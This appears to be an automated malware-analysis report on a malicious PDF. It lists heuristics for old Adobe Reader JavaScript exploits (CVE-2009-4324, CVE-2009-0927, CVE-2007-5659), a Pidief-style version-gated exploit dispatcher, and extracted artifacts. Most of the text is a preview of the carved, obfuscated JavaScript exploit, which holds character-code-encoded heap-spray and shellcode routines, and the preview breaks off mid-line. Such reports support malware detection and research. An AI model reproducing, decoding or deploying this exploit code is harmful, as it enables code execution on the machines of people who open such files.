MALICIOUS
476
Risk Score
Malware Insights
MITRE ATT&CK
T1059.001 PowerShell
The PDF file contains embedded JavaScript, indicated by the PDF_JAVASCRIPT and PDF_JS heuristics. The JavaScript stream, specifically 'javascript_obj0039_000.js', appears to be obfuscated and is likely responsible for downloading and executing a secondary payload. The 'legacy_pdfkit_stage_000.js' is a deobfuscated version of the script. The presence of String.fromCharCode further suggests obfuscation techniques common in malicious scripts.
Machine Learning
- Nyx PDF Classifier malicious score 1.0000
Heuristics 9
-
media.newPlayer — CVE-2009-4324 critical CVE exact CVE_2009_4324PDF JavaScript calls media.newPlayer — CVE-2009-4324 is a use-after-free in Adobe Reader's multimedia plugin triggered by media.newPlayer(). Actively exploited as a zero-day in December 2009. (identified after JavaScript deobfuscation)
-
Collab.getIcon — CVE-2009-0927 critical CVE exact CVE_2009_0927PDF JavaScript calls Collab.getIcon — CVE-2009-0927 is a stack buffer overflow in Adobe Reader triggered by Collab.getIcon() with a crafted argument. Allows arbitrary code execution. (identified after JavaScript deobfuscation)
-
Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
-
Pidief-style multi-CVE JavaScript dispatcher critical CVE likely PDF_PIDIEF_MULTI_CVE_DISPATCHA single JavaScript body branches on app.viewerVersion and invokes two or more of the canonical Reader sinks (Collab.collectEmailInfo, Collab.getIcon, util.printf with a field-width format string). This is the 2009-2010 Pidief.J multi-exploit landing template: a per-version dispatcher that fires the matching CVE chain for whichever Reader version opens the file.
-
Multi-CVE Adobe Reader JavaScript exploit kit critical PDF_ADOBE_READER_MULTI_CVE_JS_KITOne recovered JavaScript stage contains multiple version-gated Adobe Reader exploit branches. This is stronger evidence than independent API keywords: the PDF is selecting old Reader vulnerabilities by viewer version and running heap-sprayed Acrobat JavaScript exploit paths.
-
JavaScript action low 2 related findings PDF_JAVASCRIPTPDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTERPDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.Matched line in script
i6M5222S="C4HmQ5j=[70,85,78,67,84,73,79,78,0,70,73,88,127,73,84,8,89,65,82,8"; i6M5222S+= "3,80,12,76,69,78,9,91,87,72,73,76,69,8,89,65,82,83,80,14,"; i6M5222S+= "76,69,78,71,84,72,10,18,28,76,69,78,9,91,89,65,82,83,80,1"; i6M5222S+= "1,29,89,65,82,83,80,27,93,89,65,82,83,80,29,89,65,82,83,8"; i6M5222S+= "0,14,83,85,66,83,84,82,73,78,71,8,16,12,76,69,78,15,18,9,"; i6M5222S+= "27,82,69,84,85,82,78,0,89,65,82,83,80,27,93,45,42,70,85,7"; i6M5222S+= "8,67,84,73,79,78,0,78,69,87,80,76,65,89,69,82,8,9 … -
Embedded JS stream low PDF_JSPDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts 3
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
javascript_obj0039_000.js |
pdf-javascript-stream | PDF /JS object 39 at offset 0x16F | 20420 bytes |
SHA-256: 3b3ae952aef55af3da3e023d001f3e76f49a9ac394a7b4f19ca5dab89331a44e |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 1 eval/decoder/string-building token(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
i6M5222S="C4HmQ5j=[70,85,78,67,84,73,79,78,0,70,73,88,127,73,84,8,89,65,82,8"; i6M5222S+= "3,80,12,76,69,78,9,91,87,72,73,76,69,8,89,65,82,83,80,14,"; i6M5222S+= "76,69,78,71,84,72,10,18,28,76,69,78,9,91,89,65,82,83,80,1"; i6M5222S+= "1,29,89,65,82,83,80,27,93,89,65,82,83,80,29,89,65,82,83,8"; i6M5222S+= "0,14,83,85,66,83,84,82,73,78,71,8,16,12,76,69,78,15,18,9,"; i6M5222S+= "27,82,69,84,85,82,78,0,89,65,82,83,80,27,93,45,42,70,85,7"; i6M5222S+= "8,67,84,73,79,78,0,78,69,87,80,76,65,89,69,82,8,9,91,45,4"; i6M5222S+= "2,86,65,82,0,83,72,69,76,76,67,79,68,69,0,29,0,85,78,69,8"; i6M5222S+= "3,67,65,80,69,8,2,5,85,17,17,101,98,5,85,20,98,21,98,5,85"; i6M5222S+= ",99,25,19,19,5,85,24,17,22,22,5,85,97,102,99,25,5,85,24,1"; i6M5222S+= "6,16,17,5,85,16,98,19,20,5,85,101,18,97,22,5,85,101,98,10"; i6M5222S+= "2,97,5,85,101,24,16,21,5,85,102,102,101,97,5,85,102,102,1"; i6M5222S+= "02,102,5,85,23,99,20,102,5,85,97,22,97,22,5,85,102,25,97,"; i6M5222S+= "22,5,85,16,23,99,18,5,85,97,22,25,22,5,85,97,22,97,22,5,8"; i6M5222S+= "5,101,22,18,100,5,85,18,100,97,97,5,85,98,97,100,22,5,85,"; i6M5222S+= "18,100,16,98,5,85,97,101,99,101,5,85,100,22,18,100,5,85,1"; i6M5222S+= "8,100,24,22,5,85,18,22,97,22,5,85,99,100,25,24,5,85,21,21"; i6M5222S+= ",100,19,5,85,101,16,101,16,5,85,25,24,18,22,5,85,100,19,9"; i6M5222S+= "9,19,5,85,101,16,20,97,5,85,18,22,101,16,5,85,100,20,25,2"; i6M5222S+= "4,5,85,21,17,100,19,5,85,101,16,101,16,5,85,25,24,18,22,5"; i6M5222S+= ",85,100,19,99,24,5,85,18,100,21,22,5,85,99,99,21,17,5,85,"; i6M5222S+= "102,102,97,21,5,85,102,100,20,101,5,85,97,22,97,22,5,85,2"; i6M5222S+= "0,20,97,22,5,85,99,101,21,102,5,85,99,24,99,25,5,85,97,22"; i6M5222S+= ",97,22,5,85,100,19,99,101,5,85,99,97,100,20,5,85,102,18,9"; i6M5222S+= "9,98,5,85,98,16,21,25,5,85,20,101,18,100,5,85,101,19,20,1"; i6M5222S+= "01,5,85,97,22,97,22,5,85,99,101,97,22,5,85,25,21,99,97,5,"; i6M5222S+= "85,97,22,25,20,5,85,100,21,99,101,5,85,99,19,99,101,5,85,"; i6M5222S+= "102,18,99,97,5,85,98,16,21,25,5,85,20,101,18,100,5,85,25,"; i6M5222S+= "23,20,101,5,85,97,22,97,22,5,85,18,21,97,22,5,85,101,22,2"; i6M5222S+= "0,97,5,85,23,97,18,100,5,85,99,99,102,21,5,85,21,25,101,2"; i6M5222S+= "2,5,85,97,18,102,16,5,85,97,18,22,17,5,85,99,23,97,21,5,8"; i6M5222S+= "5,99,19,24,24,5,85,99,16,100,101,5,85,101,18,22,17,5,85,9"; i6M5222S+= "7,18,97,21,5,85,97,22,99,19,5,85,22,22,25,21,5,85,102,22,"; i6M5222S+= "102,22,5,85,102,17,102,21,5,85,21,25,102,22,5,85,97,97,10"; i6M5222S+= "2,16,5,85,23,97,18,100,5,85,102,22,102,22,5,85,102,21,102"; i6M5222S+= ",22,5,85,102,22,102,22,5,85,102,16,21,25,5,85,21,25,98,22"; i6M5222S+= ",5,85,97,101,102,16,5,85,102,16,102,23,5,85,100,19,18,100"; i6M5222S+= ",5,85,18,100,25,97,5,85,24,24,100,18,5,85,97,21,100,101,5"; i6M5222S+= ",85,102,16,21,19,5,85,100,16,18,100,5,85,97,21,24,22,5,85"; i6M5222S+= ",25,21,21,19,5,85,101,102,22,102,5,85,16,98,101,23,5,85,2"; i6M5222S+= "2,19,97,21,5,85,23,100,25,21,5,85,17,24,97,25,5,85,25,99,"; i6M5222S+= "98,22,5,85,100,18,23,16,5,85,22,23,97,101,5,85,97,98,22,1"; i6M5222S+= "00,5,85,23,99,97,21,5,85,20,100,101,22,5,85,25,100,21,23,"; i6M5222S+= "5,85,100,19,98,25,5,85,102,24,20,17,5,85,102,24,18,100,5,"; i6M5222S+= "85,97,21,24,18,5,85,99,16,23,98,5,85,97,97,18,100,5,85,18"; i6M5222S+= ",100,101,100,5,85,98,97,102,24,5,85,23,98,97,21,5,85,97,1"; i6M5222S+= "8,18,100,5,85,97,21,18,100,5,85,16,100,22,19,5,85,102,102"; i6M5222S+= ",102,24,5,85,20,101,22,21,5,85,21,25,24,23,5,85,21,25,21,"; i6M5222S+= "25,5,85,101,24,18,24,5,85,20,97,97,24,5,85,22,99,25,21,5,"; i6M5222S+= "85,102,100,18,99,5,85,23,101,100,24,5,85,100,21,20,20,5,8"; i6M5222S+= "5,98,99,25,16,5,85,100,22,24,25,5,85,17,100,102,24,5,85,9"; i6M5222S+= "8,100,20,23,5,85,100,18,99,101,5,85,100,22,100,18,5,85,24"; i6M5222S+= ",25,25,99,5,85,100,23,24,25,5,85,100,21,100,22,5,85,25,20"; i6M5222S+= ",99,100,5,85,100,20,24,24,5,85,24,25,100,19,5,85,25,22,10"; i6M5222S+= "0,21,5,85,25,17,100,102,5,85,100,23,100,101,5,85,24,25,25"; i6M5222S+= ",20,5,85,99,102,99,100,5,85,99,21,100,102,5,85,100,21,100"; i6M5222S+= ",23,5,85,24,24,25,22,5,85,99,101,100,22,5,85,25,25,100,22"; i6M5222S+= ",5,85,100,22,100,21,5,85,25,98,99,97,5,85,99,18,100,22,5,"; i6M5222S+= "85,102,25,99,16,5,85,99,19,99,24,5,85,102,22,100,17,5,85,"; i6M5222S+= "99,23,99,97,5,85,99,19,100,102,5,85,24,16,100,20,5,85,99,"; i6M5222S+= "101,99,16,5,85,97,22,25,98,2,9,27,45,42,86,65,82,0,66,76,"; i6M5222S+= "79,67,75,0,29,0,85,78,69,83,67,65,80,69,8,2,5,85,16,67,16"; i6M5222S+= ",67,5,85,16,67,16,67,2,9,27,45,42,86,65,82,0,103,100,65,7"; i6M5222S+= "1,65,99,85,89,110,70,114,115,102,90,65,115,122,108,111,0,"; i6M5222S+= "29,0,85,78,69,83,67,65,80,69,8,2,5,85,16,67,16,67,5,85,16"; i6M5222S+= ",67,16,67,5,85,16,67,16,67,5,85,16,67,16,67,5,85,16,67,16"; i6M5222S+= ",67,5,85,16,67,16,67,5,85,16,67,16,67,5,85,16,67,16,67,5,"; i6M5222S+= "85,21,17,20,69,5,85,20,24,22,21,5,85,20,24,20,20,5,85,23,"; i6M5222S+= "18,20,70,5,85,20,65,22,69,5,85,22,68,20,19,5,85,20,66,21,"; i6M5222S+= "17,5,85,20,66,23,25,5,85,23,17,21,22,5,85,20,68,20,17,5,8"; i6M5222S+= "5,21,25,20,20,5,85,21,25,22,66,5,85,23,25,23,25,5,85,22,1"; i6M5222S+= "8,21,65,5,85,22,18,22,70,5,85,23,65,22,69,5,85,22,19,20,6"; i6M5222S+= "9,5,85,20,65,20,68,5,85,22,19,20,17,5,85,22,18,21,19,5,85"; i6M5222S+= ",20,17,21,20,5,85,21,22,23,16,5,85,21,21,20,19,5,85,20,18"; i6M5222S+= ",23,19,5,85,20,67,21,17,5,85,21,23,22,68,5,85,21,23,23,18"; i6M5222S+= ",5,85,21,22,23,16,2,9,27,45,42,87,72,73,76,69,8,66,76,79,"; i6M5222S+= "67,75,14,76,69,78,71,84,72,0,28,29,0,19,18,23,22,24,9,0,6"; i6M5222S+= "6,76,79,67,75,11,29,66,76,79,67,75,27,45,42,66,76,79,67,7"; i6M5222S+= "5,29,66,76,79,67,75,14,83,85,66,83,84,82,73,78,71,8,16,12"; i6M5222S+= ",19,18,23,22,24,0,13,0,83,72,69,76,76,67,79,68,69,14,76,6"; i6M5222S+= "9,78,71,84,72,9,27,45,42,77,69,77,79,82,89,29,78,69,87,0,"; i6M5222S+= "97,82,82,65,89,8,9,27,70,79,82,8,73,29,16,27,73,28,16,88,"; i6M5222S+= "18,16,16,16,27,73,11,11,9,0,91,77,69,77,79,82,89,123,73,1"; i6M5222S+= "25,29,0,66,76,79,67,75,0,11,0,83,72,69,76,76,67,79,68,69,"; i6M5222S+= "27,93,45,42,85,84,73,76,14,80,82,73,78,84,68,8,2,82,76,80"; i6M5222S+= ",112,80,74,116,120,120,105,78,67,117,72,87,65,71,99,90,67"; i6M5222S+= ",85,104,70,77,75,90,111,66,98,115,122,100,103,110,68,99,2"; i6M5222S+= ",12,0,78,69,87,0,100,65,84,69,8,9,9,27,45,42,85,84,73,76,"; i6M5222S+= "14,80,82,73,78,84,68,8,2,115,79,84,115,88,110,113,86,109,"; i6M5222S+= "81,107,110,74,106,75,105,120,73,79,107,76,77,70,122,121,7"; i6M5222S+= "0,77,73,112,103,71,103,110,110,107,78,2,12,0,78,69,87,0,1"; i6M5222S+= "00,65,84,69,8,9,9,27,45,42,84,82,89,0,91,84,72,73,83,14,7"; i6M5222S+= "7,69,68,73,65,14,78,69,87,112,76,65,89,69,82,8,78,85,76,7"; i6M5222S+= "6,9,27,93,0,67,65,84,67,72,8,69,9,0,91,93,45,42,85,84,73,"; i6M5222S+= "76,14,80,82,73,78,84,68,8,103,100,65,71,65,99,85,89,110,7"; i6M5222S+= "0,114,115,102,90,65,115,122,108,111,12,0,78,69,87,0,100,6"; i6M5222S+= "5,84,69,8,9,9,27,93,45,42,45,42,70,85,78,67,84,73,79,78,0"; i6M5222S+= ",67,79,76,76,65,66,127,69,77,65,73,76,8,9,91,86,65,82,0,8"; i6M5222S+= "3,72,69,76,76,67,79,68,69,29,85,78,69,83,67,65,80,69,8,2,"; i6M5222S+= "5,85,17,17,101,98,5,85,20,98,21,98,5,85,99,25,19,19,5,85,"; i6M5222S+= "24,17,22,22,5,85,97,102,99,25,5,85,24,16,16,17,5,85,16,98"; i6M5222S+= ",19,20,5,85,101,18,97,22,5,85,101,98,102,97,5,85,101,24,1"; i6M5222S+= "6,21,5,85,102,102,101,97,5,85,102,102,102,102,5,85,23,99,"; i6M5222S+= "20,102,5,85,97,22,97,22,5,85,102,25,97,22,5,85,16,23,99,1"; i6M5222S+= "8,5,85,97,22,25,22,5,85,97,22,97,22,5,85,101,22,18,100,5,"; i6M5222S+= "85,18,100,97,97,5,85,98,97,100,22,5,85,18,100,16,98,5,85,"; i6M5222S+= "97,101,99,101,5,85,100,22,18,100,5,85,18,100,24,22,5,85,1"; i6M5222S+= "8,22,97,22,5,85,99,100,25,24,5,85,21,21,100,19,5,85,101,1"; i6M5222S+= "6,101,16,5,85,25,24,18,22,5,85,100,19,99,19,5,85,101,16,2"; i6M5222S+= "0,97,5,85,18,22,101,16,5,85,100,20,25,24,5,85,21,17,100,1"; i6M5222S+= "9,5,85,101,16,101,16,5,85,25,24,18,22,5,85,100,19,99,24,5"; i6M5222S+= ",85,18,100,21,22,5,85,99,99,21,17,5,85,102,102,97,21,5,85"; i6M5222S+= ",102,100,20,101,5,85,97,22,97,22,5,85,20,20,97,22,5,85,99"; i6M5222S+= ",101,21,102,5,85,99,24,99,25,5,85,97,22,97,22,5,85,100,19"; i6M5222S+= ",99,101,5,85,99,97,100,20,5,85,102,18,99,98,5,85,98,16,21"; i6M5222S+= ",25,5,85,20,101,18,100,5,85,101,19,20,101,5,85,97,22,97,2"; i6M5222S+= "2,5,85,99,101,97,22,5,85,25,21,99,97,5,85,97,22,25,20,5,8"; i6M5222S+= "5,100,21,99,101,5,85,99,19,99,101,5,85,102,18,99,97,5,85,"; i6M5222S+= "98,16,21,25,5,85,20,101,18,100,5,85,25,23,20,101,5,85,97,"; i6M5222S+= "22,97,22,5,85,18,21,97,22,5,85,101,22,20,97,5,85,23,97,18"; i6M5222S+= ",100,5,85,99,99,102,21,5,85,21,25,101,22,5,85,97,18,102,1"; i6M5222S+= "6,5,85,97,18,22,17,5,85,99,23,97,21,5,85,99,19,24,24,5,85"; i6M5222S+= ",99,16,100,101,5,85,101,18,22,17,5,85,97,18,97,21,5,85,97"; i6M5222S+= ",22,99,19,5,85,22,22,25,21,5,85,102,22,102,22,5,85,102,17"; i6M5222S+= ",102,21,5,85,21,25,102,22,5,85,97,97,102,16,5,85,23,97,18"; i6M5222S+= ",100,5,85,102,22,102,22,5,85,102,21,102,22,5,85,102,22,10"; i6M5222S+= "2,22,5,85,102,16,21,25,5,85,21,25,98,22,5,85,97,101,102,1"; i6M5222S+= "6,5,85,102,16,102,23,5,85,100,19,18,100,5,85,18,100,25,97"; i6M5222S+= ",5,85,24,24,100,18,5,85,97,21,100,101,5,85,102,16,21,19,5"; i6M5222S+= ",85,100,16,18,100,5,85,97,21,24,22,5,85,25,21,21,19,5,85,"; i6M5222S+= "101,102,22,102,5,85,16,98,101,23,5,85,22,19,97,21,5,85,23"; i6M5222S+= ",100,25,21,5,85,17,24,97,25,5,85,25,99,98,22,5,85,100,18,"; i6M5222S+= "23,16,5,85,22,23,97,101,5,85,97,98,22,100,5,85,23,99,97,2"; i6M5222S+= "1,5,85,20,100,101,22,5,85,25,100,21,23,5,85,100,19,98,25,"; i6M5222S+= "5,85,102,24,20,17,5,85,102,24,18,100,5,85,97,21,24,18,5,8"; i6M5222S+= "5,99,16,23,98,5,85,97,97,18,100,5,85,18,100,101,100,5,85,"; i6M5222S+= "98,97,102,24,5,85,23,98,97,21,5,85,97,18,18,100,5,85,97,2"; i6M5222S+= "1,18,100,5,85,16,100,22,19,5,85,102,102,102,24,5,85,20,10"; i6M5222S+= "1,22,21,5,85,21,25,24,23,5,85,21,25,21,25,5,85,101,24,18,"; i6M5222S+= "24,5,85,20,97,97,24,5,85,22,99,25,21,5,85,102,100,18,99,5"; i6M5222S+= ",85,23,101,100,24,5,85,100,21,20,20,5,85,98,99,25,16,5,85"; i6M5222S+= ",100,22,24,25,5,85,17,100,102,24,5,85,98,100,20,23,5,85,1"; i6M5222S+= "00,18,99,101,5,85,100,22,100,18,5,85,24,25,25,99,5,85,100"; i6M5222S+= ",23,24,25,5,85,100,21,100,22,5,85,25,20,99,100,5,85,100,2"; i6M5222S+= "0,24,24,5,85,24,25,100,19,5,85,25,22,100,21,5,85,25,17,10"; i6M5222S+= "0,102,5,85,100,23,100,101,5,85,24,25,25,20,5,85,99,102,99"; i6M5222S+= ",100,5,85,99,21,100,102,5,85,100,21,100,23,5,85,24,24,25,"; i6M5222S+= "22,5,85,99,101,100,22,5,85,25,25,100,22,5,85,100,22,100,2"; i6M5222S+= "1,5,85,25,98,99,97,5,85,99,18,100,22,5,85,102,25,99,16,5,"; i6M5222S+= "85,99,98,99,19,5,85,99,102,99,23,5,85,24,16,99,97,5,85,99"; i6M5222S+= ",101,99,16,5,85,97,22,25,98,2,9,27,86,65,82,0,77,69,77,12"; i6M5222S+= "7,65,82,82,65,89,29,78,69,87,0,97,82,82,65,89,8,9,27,86,6"; i6M5222S+= "5,82,0,67,67,29,16,88,16,67,16,67,16,67,16,67,27,86,65,82"; i6M5222S+= ",0,65,68,68,82,29,16,88,20,16,16,16,16,16,27,86,65,82,0,8"; i6M5222S+= "3,67,127,76,69,78,29,83,72,69,76,76,67,79,68,69,14,76,69,"; i6M5222S+= "78,71,84,72,10,18,27,86,65,82,0,76,69,78,29,65,68,68,82,1"; i6M5222S+= "3,8,83,67,127,76,69,78,11,16,88,19,24,9,27,86,65,82,0,89,"; i6M5222S+= "65,82,83,80,29,85,78,69,83,67,65,80,69,8,2,5,85,25,16,25,"; i6M5222S+= "16,5,85,25,16,25,16,2,9,27,89,65,82,83,80,29,70,73,88,127"; i6M5222S+= ",73,84,8,89,65,82,83,80,12,76,69,78,9,27,86,65,82,0,67,79"; i6M5222S+= ",85,78,84,18,29,8,67,67,13,16,88,20,16,16,16,16,16,9,15,6"; i6M5222S+= "5,68,68,82,27,70,79,82,8,86,65,82,0,67,79,85,78,84,29,16,"; i6M5222S+= "27,67,79,85,78,84,28,67,79,85,78,84,18,27,67,79,85,78,84,"; i6M5222S+= "11,11,9,91,77,69,77,127,65,82,82,65,89,123,67,79,85,78,84"; i6M5222S+= ",125,29,89,65,82,83,80,11,83,72,69,76,76,67,79,68,69,27,9"; i6M5222S+= "3,45,42,86,65,82,0,79,86,69,82,70,76,79,87,29,85,78,69,83"; i6M5222S+= ",67,65,80,69,8,2,5,85,16,67,16,67,5,85,16,67,16,67,2,9,27"; i6M5222S+= ",87,72,73,76,69,8,79,86,69,82,70,76,79,87,14,76,69,78,71,"; i6M5222S+= "84,72,28,20,20,25,21,18,9,91,79,86,69,82,70,76,79,87,11,2"; i6M5222S+= "9,79,86,69,82,70,76,79,87,27,93,45,42,84,72,73,83,14,67,7"; i6M5222S+= "9,76,76,65,66,115,84,79,82,69,29,99,79,76,76,65,66,14,67,"; i6M5222S+= "79,76,76,69,67,84,101,77,65,73,76,105,78,70,79,8,91,83,85"; i6M5222S+= ",66,74,26,2,2,12,77,83,71,26,79,86,69,82,70,76,79,87,93,9"; i6M5222S+= ",27,93,45,42,45,42,70,85,78,67,84,73,79,78,0,67,79,76,76,"; i6M5222S+= "65,66,127,71,69,84,73,67,79,78,8,9,91,73,70,8,65,80,80,14"; i6M5222S+= ",68,79,67,14,99,79,76,76,65,66,14,71,69,84,105,67,79,78,9"; i6M5222S+= ",91,86,65,82,0,65,82,82,89,29,78,69,87,0,97,82,82,65,89,8"; i6M5222S+= ",9,27,86,65,82,0,86,86,80,69,84,72,89,65,29,85,78,69,83,6"; i6M5222S+= "7,65,80,69,8,2,5,85,17,17,101,98,5,85,20,98,21,98,5,85,99"; i6M5222S+= ",25,19,19,5,85,24,17,22,22,5,85,97,102,99,25,5,85,24,16,1"; i6M5222S+= "6,17,5,85,16,98,19,20,5,85,101,18,97,22,5,85,101,98,102,9"; i6M5222S+= "7,5,85,101,24,16,21,5,85,102,102,101,97,5,85,102,102,102,"; i6M5222S+= "102,5,85,23,99,20,102,5,85,97,22,97,22,5,85,102,25,97,22,"; i6M5222S+= "5,85,16,23,99,18,5,85,97,22,25,22,5,85,97,22,97,22,5,85,1"; i6M5222S+= "01,22,18,100,5,85,18,100,97,97,5,85,98,97,100,22,5,85,18,"; i6M5222S+= "100,16,98,5,85,97,101,99,101,5,85,100,22,18,100,5,85,18,1"; i6M5222S+= "00,24,22,5,85,18,22,97,22,5,85,99,100,25,24,5,85,21,21,10"; i6M5222S+= "0,19,5,85,101,16,101,16,5,85,25,24,18,22,5,85,100,19,99,1"; i6M5222S+= "9,5,85,101,16,20,97,5,85,18,22,101,16,5,85,100,20,25,24,5"; i6M5222S+= ",85,21,17,100,19,5,85,101,16,101,16,5,85,25,24,18,22,5,85"; i6M5222S+= ",100,19,99,24,5,85,18,100,21,22,5,85,99,99,21,17,5,85,102"; i6M5222S+= ",102,97,21,5,85,102,100,20,101,5,85,97,22,97,22,5,85,20,2"; i6M5222S+= "0,97,22,5,85,99,101,21,102,5,85,99,24,99,25,5,85,97,22,97"; i6M5222S+= ",22,5,85,100,19,99,101,5,85,99,97,100,20,5,85,102,18,99,9"; i6M5222S+= "8,5,85,98,16,21,25,5,85,20,101,18,100,5,85,101,19,20,101,"; i6M5222S+= "5,85,97,22,97,22,5,85,99,101,97,22,5,85,25,21,99,97,5,85,"; i6M5222S+= "97,22,25,20,5,85,100,21,99,101,5,85,99,19,99,101,5,85,102"; i6M5222S+= ",18,99,97,5,85,98,16,21,25,5,85,20,101,18,100,5,85,25,23,"; i6M5222S+= "20,101,5,85,97,22,97,22,5,85,18,21,97,22,5,85,101,22,20,9"; i6M5222S+= "7,5,85,23,97,18,100,5,85,99,99,102,21,5,85,21,25,101,22,5"; i6M5222S+= ",85,97,18,102,16,5,85,97,18,22,17,5,85,99,23,97,21,5,85,9"; i6M5222S+= "9,19,24,24,5,85,99,16,100,101,5,85,101,18,22,17,5,85,97,1"; i6M5222S+= "8,97,21,5,85,97,22,99,19,5,85,22,22,25,21,5,85,102,22,102"; i6M5222S+= ",22,5,85,102,17,102,21,5,85,21,25,102,22,5,85,97,97,102,1"; i6M5222S+= "6,5,85,23,97,18,100,5,85,102,22,102,22,5,85,102,21,102,22"; i6M5222S+= ",5,85,102,22,102,22,5,85,102,16,21,25,5,85,21,25,98,22,5,"; i6M5222S+= "85,97,101,102,16,5,85,102,16,102,23,5,85,100,19,18,100,5,"; i6M5222S+= "85,18,100,25,97,5,85,24,24,100,18,5,85,97,21,100,101,5,85"; i6M5222S+= ",102,16,21,19,5,85,100,16,18,100,5,85,97,21,24,22,5,85,25"; i6M5222S+= ",21,21,19,5,85,101,102,22,102,5,85,16,98,101,23,5,85,22,1"; i6M5222S+= "9,97,21,5,85,23,100,25,21,5,85,17,24,97,25,5,85,25,99,98,"; i6M5222S+= "22,5,85,100,18,23,16,5,85,22,23,97,101,5,85,97,98,22,100,"; i6M5222S+= "5,85,23,99,97,21,5,85,20,100,101,22,5,85,25,100,21,23,5,8"; i6M5222S+= "5,100,19,98,25,5,85,102,24,20,17,5,85,102,24,18,100,5,85,"; i6M5222S+= "97,21,24,18,5,85,99,16,23,98,5,85,97,97,18,100,5,85,18,10"; i6M5222S+= "0,101,100,5,85,98,97,102,24,5,85,23,98,97,21,5,85,97,18,1"; i6M5222S+= "8,100,5,85,97,21,18,100,5,85,16,100,22,19,5,85,102,102,10"; i6M5222S+= "2,24,5,85,20,101,22,21,5,85,21,25,24,23,5,85,21,25,21,25,"; i6M5222S+= "5,85,101,24,18,24,5,85,20,97,97,24,5,85,22,99,25,21,5,85,"; i6M5222S+= "102,100,18,99,5,85,23,101,100,24,5,85,100,21,20,20,5,85,9"; i6M5222S+= "8,99,25,16,5,85,100,22,24,25,5,85,17,100,102,24,5,85,98,1"; i6M5222S+= "00,20,23,5,85,100,18,99,101,5,85,100,22,100,18,5,85,24,25"; i6M5222S+= ",25,99,5,85,100,23,24,25,5,85,100,21,100,22,5,85,25,20,99"; i6M5222S+= ",100,5,85,100,20,24,24,5,85,24,25,100,19,5,85,25,22,100,2"; i6M5222S+= "1,5,85,25,17,100,102,5,85,100,23,100,101,5,85,24,25,25,20"; i6M5222S+= ",5,85,99,102,99,100,5,85,99,21,100,102,5,85,100,21,100,23"; i6M5222S+= ",5,85,24,24,25,22,5,85,99,101,100,22,5,85,25,25,100,22,5,"; i6M5222S+= "85,100,22,100,21,5,85,25,98,99,97,5,85,99,18,100,22,5,85,"; i6M5222S+= "102,25,99,16,5,85,99,19,99,17,5,85,99,102,100,18,5,85,99,"; i6M5222S+= "25,99,21,5,85,24,16,99,24,5,85,99,101,99,16,5,85,97,22,25"; i6M5222S+= ",98,2,9,27,86,65,82,0,72,119,81,21,16,16,99,110,29,86,86,"; i6M5222S+= "80,69,84,72,89,65,14,76,69,78,71,84,72,10,18,27,86,65,82,"; i6M5222S+= "0,76,69,78,29,16,88,20,16,16,16,16,16,13,8,72,119,81,21,1"; i6M5222S+= "6,16,99,110,11,16,88,19,24,9,27,86,65,82,0,89,65,82,83,80"; i6M5222S+= ",29,85,78,69,83,67,65,80,69,8,2,5,85,25,16,25,16,5,85,25,"; i6M5222S+= "16,25,16,2,9,27,89,65,82,83,80,29,70,73,88,127,73,84,8,89"; i6M5222S+= ",65,82,83,80,12,76,69,78,9,27,86,65,82,0,80,21,97,74,107,"; i6M5222S+= "22,21,70,29,8,16,88,16,67,16,67,16,67,16,67,13,16,88,20,1"; i6M5222S+= "6,16,16,16,16,9,15,16,88,20,16,16,16,16,16,27,70,79,82,8,"; i6M5222S+= "86,65,82,0,86,81,67,113,100,25,22,89,29,16,27,86,81,67,11"; i6M5222S+= "3,100,25,22,89,28,80,21,97,74,107,22,21,70,27,86,81,67,11"; i6M5222S+= "3,100,25,22,89,11,11,9,91,65,82,82,89,123,86,81,67,113,10"; i6M5222S+= "0,25,22,89,125,29,89,65,82,83,80,11,86,86,80,69,84,72,89,"; i6M5222S+= "65,27,93,45,42,86,65,82,0,84,117,109,72,110,66,103,87,29,"; i6M5222S+= "85,78,69,83,67,65,80,69,8,2,5,16,25,2,9,27,87,72,73,76,69"; i6M5222S+= ",8,84,117,109,72,110,66,103,87,14,76,69,78,71,84,72,28,16"; i6M5222S+= ",88,20,16,16,16,9,91,84,117,109,72,110,66,103,87,11,29,84"; i6M5222S+= ",117,109,72,110,66,103,87,27,93,45,42,84,117,109,72,110,6"; i6M5222S+= "6,103,87,29,2,110,14,2,11,84,117,109,72,110,66,103,87,27,"; i6M5222S+= "65,80,80,14,68,79,67,14,99,79,76,76,65,66,14,71,69,84,105"; i6M5222S+= ",67,79,78,8,84,117,109,72,110,66,103,87,9,27,93,93,45,42,"; i6M5222S+= "45,42,70,85,78,67,84,73,79,78,0,80,68,70,127,67,72,69,67,"; i6M5222S+= "75,127,86,69,82,83,8,9,91,45,42,86,65,82,0,86,69,82,83,73"; i6M5222S+= ",79,78,29,65,80,80,14,86,73,69,87,69,82,118,69,82,83,73,7"; i6M5222S+= "9,78,14,84,79,115,84,82,73,78,71,8,9,27,45,42,86,69,82,83"; i6M5222S+= ",73,79,78,29,86,69,82,83,73,79,78,14,82,69,80,76,65,67,69"; i6M5222S+= ",8,15,124,100,15,71,12,7,7,9,27,45,42,86,65,82,0,86,69,82"; i6M5222S+= ",127,65,82,82,65,89,29,78,69,87,0,97,82,82,65,89,8,86,69,"; i6M5222S+= "82,83,73,79,78,14,67,72,65,82,97,84,8,16,9,12,86,69,82,83"; i6M5222S+= ",73,79,78,14,67,72,65,82,97,84,8,17,9,12,86,69,82,83,73,7"; i6M5222S+= "9,78,14,67,72,65,82,97,84,8,18,9,9,27,45,42,45,42,73,70,8"; i6M5222S+= 